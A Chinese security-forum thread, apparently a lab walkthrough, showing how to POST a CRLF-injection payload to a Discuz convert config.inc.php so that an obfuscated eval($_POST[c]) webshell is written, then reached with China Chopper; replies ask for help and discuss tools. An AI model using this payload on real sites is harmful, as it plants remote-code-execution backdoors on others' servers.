用户
搜索
    奋斗

连续签到: 1 天

i春秋-核心白帽

魔法币
    收听
    看了一下攻略,发现很多人不会burpsuit的post用法。
    就找了一种很简单的方法也可以。

先打开firefox浏览器,按下f9,
    点loadurl,构造l链接:http://www.test.com/utility/convert/data/config.inc.php
    勾选enable post date ,输入:
    newconfig[aaa%0a%0deval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(36).CHR(95).CHR(80).CHR(79).CHR(83).CHR(84).CHR(91).CHR(99).CHR(93).CHR(59).CHR(34).CHR(41).CHR(59));//]=aaaa&submit=yes
    点execute选项。

用菜刀连接,就可以了。

2016-07-23 11-51-43屏幕截图.png
    表示看不懂,可以详细点吗?
    使用道具 举报 回复
    现在帖子改不了,将就看吧。
    2016-07-23 12-32-37屏幕截图.png
    使用道具 举报 回复
    good study day day up
    使用道具 举报 回复
    这个貌似很不错啊
    使用道具 举报 回复
    期待楼主开源,呵呵
    使用道具 举报 回复
    看看啊,不错的东西
    使用道具 举报 回复
    下来学习一下,谢谢分享
    使用道具 举报 回复
    我想说是因为这个虚拟机的burpsuit中,repeater的编辑长度有问题吧,fiddler更惨,连编辑都很难做到。

最后缺失要用攻略中的proxy拦截修改才可以。
    使用道具 举报 回复